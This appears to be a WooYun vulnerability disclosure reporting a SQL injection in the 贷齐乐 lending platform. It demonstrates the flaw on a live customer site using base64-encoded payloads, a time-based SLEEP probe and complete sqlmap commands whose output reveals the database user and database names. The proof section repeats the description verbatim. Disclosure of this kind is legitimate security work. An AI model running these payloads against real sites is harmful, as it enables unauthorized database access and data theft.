当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135819

漏洞标题:贷齐乐网贷系统一处无限制注入

相关厂商:chinaanhe.com

漏洞作者: 路人曱

提交时间:2015-08-21 15:00

修复时间:2015-11-19 16:44

公开时间:2015-11-19 16:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-21: 细节已通知厂商并且等待厂商处理中
2015-08-21: 厂商已经确认,细节仅向厂商公开
2015-08-24: 细节向第三方安全合作伙伴开放
2015-10-15: 细节向核心白帽子及相关领域专家公开
2015-10-25: 细节向普通白帽子公开
2015-11-04: 细节向实习白帽子公开
2015-11-19: 细节向公众公开

简要描述:

rt

详细说明:

我发现你们demo有些也没打补丁
我就去找了个真正的最新版
你们成功案例最新的一个 创具财富
之前的漏洞包括Client-ip都修复了
但是还是发现了一个无限制的注入
http://www.chuangjucf.com/index.php?user&q=action/reg&u=cmVnX2ludml0ZTIzNQ==
u参数base64encode 绕过过滤
但是全局不报错 不回显了
只能time-based blind
http://www.chuangjucf.com/index.php?user&q=action/reg&u=cmVnX2ludml0ZTIzNSBhbmQgc2xlZXAoNSk=
访问延迟5秒
只需构造下 即可放入sqlmap
sqlmap -u "http://www.chuangjucf.com/index.php?user&q=action/reg&u=" --prefix "reg_invite235" --tamper base64encode --technique T -p "u" --current-user

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: u
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: user&q=action/reg&u=reg_invite235 AND SLEEP(5)
---
[11:52:29] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:52:29] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
[11:52:29] [INFO] fetching current user
[11:52:29] [INFO] resumed: root@localhost
current user: 'root@localhost'
[11:52:29] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.chuangjucf.com


sqlmap -u "http://www.chuangjucf.com/index.php?user&q=action/reg&u=" --prefix "reg_invite235" --tamper base64encode --technique T -p "u" --dbs

available databases [1]:
[*] chuangjucf

漏洞证明:

我发现你们demo有些也没打补丁
我就去找了个真正的最新版
你们成功案例最新的一个 创具财富
之前的漏洞包括Client-ip都修复了
但是还是发现了一个无限制的注入
http://www.chuangjucf.com/index.php?user&q=action/reg&u=cmVnX2ludml0ZTIzNQ==
u参数base64encode 绕过过滤
但是全局不报错 不回显了
只能time-based blind
http://www.chuangjucf.com/index.php?user&q=action/reg&u=cmVnX2ludml0ZTIzNSBhbmQgc2xlZXAoNSk=
访问延迟5秒
只需构造下 即可放入sqlmap
sqlmap -u "http://www.chuangjucf.com/index.php?user&q=action/reg&u=" --prefix "reg_invite235" --tamper base64encode --technique T -p "u" --current-user

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: u
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: user&q=action/reg&u=reg_invite235 AND SLEEP(5)
---
[11:52:29] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:52:29] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
[11:52:29] [INFO] fetching current user
[11:52:29] [INFO] resumed: root@localhost
current user: 'root@localhost'
[11:52:29] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.chuangjucf.com


sqlmap -u "http://www.chuangjucf.com/index.php?user&q=action/reg&u=" --prefix "reg_invite235" --tamper base64encode --technique T -p "u" --dbs

available databases [1]:
[*] chuangjucf

修复方案:

过滤

版权声明:转载请注明来源 路人曱@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-08-21 16:42

厂商回复:

谢谢

最新状态:

暂无